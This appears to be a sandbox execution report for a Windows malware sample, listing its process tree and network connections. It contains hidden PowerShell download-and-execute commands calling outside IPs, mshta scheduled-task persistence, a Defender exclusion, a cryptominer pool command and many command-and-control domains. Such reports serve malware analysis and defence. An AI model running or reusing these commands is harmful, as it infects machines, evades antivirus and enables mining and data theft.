C:\Windows\system32\cmd.exe /c schtasks /create /tn 7t65Omafmt1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\SMNf6sBUw.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\SMNf6sBUw.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 7t65Omafmt1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\SMNf6sBUw.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "a3WAkmatu4N" /tr "mshta \"C:\Temp\5Aqb7QJ60.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\5Aqb7QJ60.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

"C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe

"C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"

C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE

"C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE"

C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5032 -ip 5032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 788

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\ProgramData\bxagwdt\nharnrr.exe

C:\ProgramData\bxagwdt\nharnrr.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4988 -ip 4988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 800

C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\14F5.tmp\14F6.tmp\14F7.bat C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10108880101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10108880101\zY9sqWs.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe988fcc40,0x7ffe988fcc4c,0x7ffe988fcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2356 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3100 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4612 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4532,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4420 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe

"C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4704 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4968,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4928 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\xmXCfoJJ\Anubis.exe""

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5012,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4684 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5244,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5256 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5364,i,15503867370873069855,17493574761386287556,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5536 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe989046f8,0x7ffe98904708,0x7ffe98904718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1996,281184239895235492,13580762555492513926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4460 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe

"C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe"

C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe

"C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe"

C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe

"C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5724 -ip 5724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 800

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oyjnxywn\oyjnxywn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0B4.tmp" "c:\Users\Admin\AppData\Local\Temp\oyjnxywn\CSC3B73577943D247079958FCB5A253184C.TMP"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe

"C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\hd26p" & exit

C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe

"C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 91.214.78.34:5556 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
DE 5.75.210.149:443 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 ls.t.goldenloafuae.com udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 104.86.110.232:80 e5.o.lencr.org tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.234:443 ogads-pa.googleapis.com udp
GB 216.58.201.110:443 apis.google.com udp
US 104.21.69.194:443 codxefusion.top tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 gadgethgfub.icu udp
GB 172.217.169.65:443 clients2.googleusercontent.com udp
US 8.8.8.8:53 explorebieology.run udp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
N/A 224.0.0.251:5353 udp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 104.21.9.123:443 moderzysics.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.9.123:443 moderzysics.top tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.189.173.21:443 nw-umwatson.events.data.microsoft.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
CH 185.208.156.162:80 185.208.156.162 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.96.1:443 exarthynature.run tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4086 towerbingobongoboom.com tcp
US 104.21.96.1:443 exarthynature.run tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 dryentaidne.run udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
